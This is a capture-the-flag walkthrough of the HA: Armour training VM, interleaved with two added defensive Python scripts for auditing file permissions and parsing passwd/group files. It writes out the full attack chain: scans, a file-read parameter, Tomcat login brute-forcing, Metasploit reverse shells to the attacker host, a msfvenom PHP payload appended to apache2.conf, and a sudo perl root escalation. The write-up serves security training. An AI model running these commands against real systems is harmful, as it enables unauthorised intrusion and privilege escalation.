• HA: Armour-Write-up



    Download link: click me

    bilibili: click me

    Information gathering

    • A host-discovery scan with nmap finds the target IP: 192.168.116.140
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00031s latency).
    Nmap scan report for 192.168.116.140
    Host is up (0.00074s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
    ➜  ~ nmap -A -T4 192.168.116.140 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.0018s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA: Armour
    8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
    | ajp-methods: 
    |_  Supported methods: GET HEAD POST OPTIONS
    8080/tcp  open  http    Apache Tomcat 9.0.24
    |_http-favicon: Apache Tomcat
    |_http-title: Apache Tomcat/9.0.24
    65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
    |   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
    |_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
    ➜  ~
    
    • Ports 80, 8009 and 8080 are open; all three are web-related services: Apache httpd, Apache JServ (AJP) and Apache Tomcat respectively. Port 65534 is an SSH service.
    • Connecting to SSH on that port shows a banner containing the first flag, HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}, and a hint: TheOlympics
    ➜  ~ ssh 192.168.116.140 -p65534      
    The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
    ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
    
                                                                                                 
           db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba   
          d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b  
         d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P  
        d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'  
       d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'    
      d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b    
     d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b   
    d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                                                                                 
                                                                                                 
                                    www.hackingarticles.in
    
                     HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                            
                                  Hint 1: TheOlympics
    
    kali-team@192.168.116.140's password:
    
    • Opening port 80 in a browser and pressing F12, the page source contains comments mentioning armour, notes.txt and 69. At first the meaning was unclear, but anyone familiar with the TCP/UDP port list can guess that 69 is the port of TFTP (Trivial File Transfer Protocol); see the detailed TCP/UDP port list.
    • nmap with a UDP scan can check whether port 69 is open.
    ➜  ~ sudo  nmap -sU -p69 192.168.116.140
    [sudo] kali-team 的密码:
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.00073s latency).
    
    PORT   STATE         SERVICE
    69/udp open|filtered tftp
    MAC Address: 00:0C:29:E7:98:9F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
    
    • Because raw UDP packets have to be sent, the scan is run with sudo as root. The result shows that port 69 is open on the target.
    • Connect with a TFTP client and download notes.txt to get the second flag.
    ➜  ~ atftp                
    tftp> connect 192.168.116.140
    tftp> get notes.txt
    tftp> quit 
    ➜  ~ cat notes.txt
    Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
    
    Hint 2: maybeevena
    ➜  ~
    
    • There is another hint, maybeevena, which makes no sense yet. Next, brute-force files with a .php extension on port 80.
    ➜  ~ dirb http://192.168.116.140 -X .php
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Oct  9 22:23:10 2019
    URL_BASE: http://192.168.116.140/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.140/ ----
    + http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    -----------------
    END_TIME: Wed Oct  9 22:23:13 2019
    DOWNLOADED: 4612 - FOUND: 1
    ➜  ~
    
    • file.php is found, but the page is blank when opened, so fuzz the parameter name.
    ➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        
    
    Total time: 0.130840
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 588.5036
    
    ➜  ~
    
    • The parameter is file, and it is an arbitrary file read vulnerability. Since the service is Apache, the first idea is to read Apache-related files; a sensitive one is .htpasswd, usually located at /etc/apache2/.htpasswd.
    ➜  ~ curl http://192.168.116.140/file.php?file=/etc/apache2/.htpasswd                      
    Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
    
    
    Hint 3: StarBucks
    ➜  ~
    
    • That gives the third flag and the third hint: StarBucks.
    • Official hint:

    P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

    • Joining the three hints gives TheOlympics maybeevena StarBucks; use that as the password.

    Getting a session through Tomcat

    • Port 8080 in the browser is a Tomcat manager page. The password is already known; now brute-force the username.
    ➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
    CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
    Starting at http://192.168.116.140
    Visiting: http://192.168.116.140, got response code 200
    Attribute text found:
    
    
    Offsite link, not following: https://hackingarticles.in
    Writing words to file
    ➜  CeWL git:(master) ✗ cat dict.txt           
    Armour
    PAGE
    CONTENT
    Header
    ARMOUR
    Collection
    Armours
    MCU
    Photo
    Grid
    armour
    End
    Page
    Content
    Footer
    Powered
    Hacking
    Articles
    notes
    txt
    ➜  CeWL git:(master) ✗ pwd               
    /home/kali-team/Kali-Team_Tools/CeWL
    ➜  CeWL git:(master) ✗
    
    • CeWL crawls the port 80 site to generate a username wordlist, and the Metasploit tomcat_mgr_login module is used to enumerate Tomcat logins with it.
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 
    
    Module options (auxiliary/scanner/http/tomcat_mgr_login):
    
       Name              Current Setting                                                 Required  Description
       ----              ---------------                                                 --------  -----------
       BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
       DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
       PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
       PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
       Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             8080                                                            yes       The target port (TCP)
       SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
       STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
       TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
       THREADS           1                                                               yes       The number of concurrent threads
       USERNAME                                                                          no        The HTTP username to specify for authentication
       USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false                                                           no        Try the username as the password for all users
       USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
       VERBOSE           true                                                            yes       Whether to print output for all attempts
       VHOST                                                                             no        HTTP server virtual host
    
    msf5 auxiliary(scanner/http/tomcat_mgr_login) >
    
    • For some reason the enumeration only succeeded after I rebooted the server; the username is armour.
    • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
    • There are many ways to upload a webshell to Tomcat, for example deploying a WAR file manually through the manager.
    • Here Metasploit is used to save time.
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
    set httppassword  
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
    httppassword => TheOlympicsmaybeevenaStarBucks
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
    httpusername => armour
    msf5 exploit(multi/http/tomcat_mgr_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Retrieving session ID and CSRF token...
    [*] Uploading and deploying wJ0oIWvcGX...
    [*] Executing wJ0oIWvcGX...
    [*] Undeploying wJ0oIWvcGX ...
    [*] Sending stage (53867 bytes) to 192.168.116.140
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
    
    meterpreter >
    
    • Enumerate the ports listening locally on the target
    meterpreter > shell 
    Process 61 created.
    Channel 75 created.
    netstat -antp
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
    tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -                   
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
    tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -                   
    tcp6       0      0 :::8080                 :::*                    LISTEN      572/java            
    tcp6       0      0 :::80                   :::*                    LISTEN      -                   
    tcp6       0      0 :::65534                :::*                    LISTEN      -                   
    tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java            
    tcp6       0      0 :::8009                 :::*                    LISTEN      572/java            
    tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
    
    • Port 8081 is listening on the target but bound to 127.0.0.1, so it is only reachable locally. It can be forwarded out with Meterpreter's built-in portfwd command.
    meterpreter > portfwd /?
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    
    OPTIONS:
    
        -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
        -R        Indicates a reverse port forward.
        -h        Help banner.
        -i <opt>  Index of the port forward entry to interact with (see the "list" command).
        -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
        -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
        -r <opt>  Forward: remote host to connect to.
    meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
    [*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
    meterpreter >
    
    • Now accessing port 8081 on the attacking machine returns the fourth flag.
    ➜  ~ curl http://127.0.0.1:8081                                        
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    
    • Or fetch it directly on the target host:
    tomcat@ubuntu:~$ cd /tmp
    cd /tmp
    tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
    wget http://127.0.0.1:8081
    --2019-10-10 04:46:42--  http://127.0.0.1:8081/
    Connecting to 127.0.0.1:8081... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 56 [text/html]
    Saving to: ‘index.html’
    
    index.html          100%[===================>]      56  --.-KB/s    in 0s      
    
    2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
    
    tomcat@ubuntu:/tmp$ cat index.html
    cat index.html
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    tomcat@ubuntu:/tmp$
    

    Privilege escalation

    • Search for SGID files
    tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
    find / -perm -g=s -type f 2>/dev/null
    /sbin/pam_extrausers_chkpwd
    /sbin/unix_chkpwd
    /usr/bin/crontab
    /usr/bin/expiry
    /usr/bin/chage
    /usr/bin/ssh-agent
    /usr/bin/wall
    /usr/bin/bsd-write
    /usr/bin/mlocate
    tomcat@ubuntu:/$
    
    • Search for SUID files
    tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/umount
    /bin/su
    /bin/ping
    /bin/fusermount
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    tomcat@ubuntu:/$ 
    tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
    find / -perm -4000 2>dev/null | xargs ls -la
    -rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
    -rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
    -rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
    -rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
    -rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
    -rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
    -rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
    -rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
    -rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
    -rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
    -rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
    -rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
    tomcat@ubuntu:/$
    
    • Search for writable directories; /var/www/html is among them.
    tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
    find / -writable -type d 2>/dev/null
    /dev/mqueue
    /dev/shm
    /tftpboot
    /var/lib/php/sessions
    /var/www/html
    /var/tmp
    /proc/902/task/902/fd
    /proc/902/fd
    /proc/902/map_files
    /tmp
    
    • Search for writable files owned by root
    tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
    <ev/null | grep -v "/proc/" |xargs ls -al |grep root
    -rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
    -rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
    --w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
    tomcat@ubuntu:/$
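
    The listing above is exactly the kind of output a defender should audit: a root-owned configuration file with mode 777 is the misconfiguration the rest of this write-up builds on. The following is an added example, not code from the original write-up; it parses GNU `ls -l` lines, ignores the kernel pseudo-filesystems (/proc, /sys, /dev) where world-writable control files are normal, and flags root-owned regular files that are world-writable or writable by a non-root group. SAMPLE_LISTING is constructed from the output shown above plus one made-up, correctly permissioned file (/etc/apache2/envvars) so that the filter has something to leave alone.

```python
"""Flag root-owned files that are writable by everyone, from `ls -l` output.

Added example, not part of the original write-up. SAMPLE_LISTING is constructed
from the `find / -writable -type f | xargs ls -al` output above; the last line is
a made-up non-writable file. The parser assumes GNU `ls -l` layout: mode, link
count, owner, group, size, three date tokens, path.
"""
import re
from dataclasses import dataclass

SAMPLE_LISTING = """\
-rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-r--r-- 1 root   root     1782 Sep 21 11:30 /etc/apache2/envvars
"""

# Kernel pseudo-filesystems: world-writable control files there are interfaces, not misconfigurations.
PSEUDO_FS_PREFIXES = ("/proc/", "/sys/", "/dev/")

LS_LINE = re.compile(
    r"^(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>.+?)\s*$"
)


@dataclass(frozen=True)
class Finding:
    path: str
    owner: str
    group: str
    mode: str
    reason: str


def parse_ls_line(line):
    """Return the mode/owner/group/path fields of one `ls -l` line, or None if it does not parse."""
    m = LS_LINE.match(line)
    return m.groupdict() if m else None


def audit_listing(text):
    """Return a Finding for every regular, root-owned file that others or a foreign group can write."""
    findings = []
    for line in text.splitlines():
        entry = parse_ls_line(line)
        if entry is None or entry["mode"][0] != "-":
            continue                      # skip directories, symlinks and unparseable lines
        mode, path = entry["mode"], entry["path"]
        if path.startswith(PSEUDO_FS_PREFIXES) or entry["owner"] != "root":
            continue
        if mode[8] == "w":                # other-write bit
            findings.append(Finding(path, entry["owner"], entry["group"], mode,
                                    "root-owned file is world-writable"))
        elif mode[5] == "w" and entry["group"] != "root":   # group-write bit for a non-root group
            findings.append(Finding(path, entry["owner"], entry["group"], mode,
                                    f"root-owned file is writable by group {entry['group']}"))
    return findings


def harden_mode(mode):
    """Mode string with group and other write bits cleared, i.e. the result of `chmod go-w`."""
    chars = list(mode)
    for i in (5, 8):
        if chars[i] == "w":
            chars[i] = "-"
    return "".join(chars)


if __name__ == "__main__":
    for f in audit_listing(SAMPLE_LISTING):
        print(f"{f.path}: {f.reason} ({f.mode} -> {harden_mode(f.mode)})")
```

    Run against the sample it reports only apache2.conf and tomcat-users.xml; the /sys entries and the 644 file are skipped. On a real host, feed it the output of the same `find ... | xargs ls -al` pipeline used above.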
    
    • /etc/apache2/apache2.conf and /opt/tomcat/conf/tomcat-users.xml are writable.
    • /opt/tomcat/conf/tomcat-users.xml only contains the credentials already known, so the only file left to look at is /etc/apache2/apache2.conf.
    • Look at the passwd file. Each line is split by colons (:) into 7 fields: username:password:UID:GID:comment (GECOS):home directory:login shell
    • The group file's fields are: group name:password:GID:list of member users
    tomcat@ubuntu:/$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
    armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    tomcat:x:1001:1001::/opt/tomcat:/bin/false
    aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
    tomcat@ubuntu:/$ 
    
    
    tomcat@ubuntu:~$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,armour
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:armour
    floppy:x:25:
    tape:x:26:
    sudo:x:27:armour
    audio:x:29:
    dip:x:30:armour
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:armour
    staff:x:50:
    games:x:60:
    users:x:100:
    nogroup:x:65534:
    systemd-journal:x:101:
    systemd-network:x:102:
    systemd-resolve:x:103:
    input:x:104:
    crontab:x:105:
    syslog:x:106:
    messagebus:x:107:
    mlocate:x:108:
    uuidd:x:109:
    ssh:x:110:
    armour:x:1000:
    lpadmin:x:111:armour
    sambashare:x:112:armour
    ssl-cert:x:113:
    tomcat:x:1001:
    aarti:x:1002:
    tomcat@ubuntu:~$
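
    To make the passwd and group field layout described above concrete, here is an added example (not code from the original write-up) that parses both files and answers the questions the write-up answers by eye: which accounts have a real login shell, which are UID 0, and which groups each user belongs to, combining the primary GID from passwd with the supplementary members listed in group. SAMPLE_PASSWD and SAMPLE_GROUP are constructed subsets of the two listings above.

```python
"""Parse /etc/passwd and /etc/group and answer "who can log in, and as what".

Added example, not part of the original write-up. SAMPLE_PASSWD and
SAMPLE_GROUP are constructed subsets of the two files shown above.
"""
from dataclasses import dataclass

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
"""

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,armour
sudo:x:27:armour
www-data:x:33:
armour:x:1000:
tomcat:x:1001:
aarti:x:1002:
"""

# Shells that deliberately refuse an interactive login.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


@dataclass
class User:
    name: str
    uid: int
    gid: int        # primary group
    gecos: str      # comment / full name field
    home: str
    shell: str


@dataclass
class Group:
    name: str
    gid: int
    members: list   # supplementary members listed in /etc/group


def parse_passwd(text):
    """username:password:UID:GID:GECOS:home:shell -> {name: User}."""
    users = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"passwd line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        users[name] = User(name, int(uid), int(gid), gecos, home, shell)
    return users


def parse_group(text):
    """groupname:password:GID:member,member -> {name: Group}."""
    groups = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            raise ValueError(f"group line {lineno}: expected 4 fields, got {len(fields)}")
        name, _pw, gid, members = fields
        groups[name] = Group(name, int(gid), [m for m in members.split(",") if m])
    return groups


def login_users(users):
    """Accounts whose shell allows an interactive login."""
    return sorted(u.name for u in users.values() if u.shell not in NON_LOGIN_SHELLS)


def uid0_accounts(users):
    """Every account that is effectively root, not just the one named root."""
    return sorted(u.name for u in users.values() if u.uid == 0)


def groups_of(username, users, groups):
    """Primary group (matched by GID) plus every group that lists the user as a member."""
    gid = users[username].gid
    return sorted(g.name for g in groups.values() if g.gid == gid or username in g.members)


def members_of(groupname, users, groups):
    """The reverse view: users whose primary GID is this group, plus the listed members."""
    group = groups[groupname]
    return sorted({u.name for u in users.values() if u.gid == group.gid} | set(group.members))


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    groups = parse_group(SAMPLE_GROUP)
    for name in login_users(users):
        print(f"{name}: groups={groups_of(name, users, groups)}")
    print("sudo group members:", members_of("sudo", users, groups))
```

    On the sample this reports root, armour and aarti as login-capable, and shows that armour is in the sudo group while aarti is not, which is why the sudoers entry found later matters.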
    
    • Two regular users are found: aarti and armour.
    • Download the Apache configuration file to the attacking machine. By default Apache runs as the www-data user:
    http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
    
    • Change the User and Group directives so that Apache runs as one of the regular users above. Why not run it as root? Because without recompiling, Apache cannot run with root privileges, and the web service would not even start. So the only option is aarti.
    • Overwrite the Apache configuration file:
    tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
    <p://192.168.116.1:8000/apache2.conf -O apache2.conf
    --2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
    Connecting to 192.168.116.1:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7195 (7.0K) [text/plain]
    Saving to: ‘apache2.conf’
    
    apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      
    
    utime(apache2.conf): Operation not permitted
    2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
    
    tomcat@ubuntu:/etc/apache2$ cat apache2.conf
    
    • After that, write a webshell into the web root served on port 80. (This is what the official challenge author did.) I tried it and it did not work: the file is created by the tomcat user and aarti cannot read it, so it cannot be served and the server returns a 500 error.
    • Instead, I got a session by including the Apache configuration file through the file inclusion.
    • That is, append the shell to apache2.conf and then include it through the file inclusion vulnerability found earlier.
    ➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
    ➜  ~ cat shell.php >> apache2.conf 
    
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:2333 
    [*] Sending stage (38288 bytes) to 192.168.116.140
    [*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
    
    meterpreter > getuid 
    Server username: aarti (1002)
    meterpreter > shell 
    Process 12388 created.
    Channel 0 created.
    python3.6 -c 'import pty;pty.spawn("/bin/bash")'
    aarti@ubuntu:/var/www/html$ whoami
    whoami
    aarti
    aarti@ubuntu:/var/www/html$
    

    Escalating to root

    • List the passwordless sudo entries; there is one for perl.
    aarti@ubuntu:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for aarti on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User aarti may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/perl
    aarti@ubuntu:/var/www/html$ 
    aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
    sudo perl -e 'exec "/bin/bash";'
    root@ubuntu:/var/www/html# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:/var/www/html# 
    root@ubuntu:~# ls
    ls
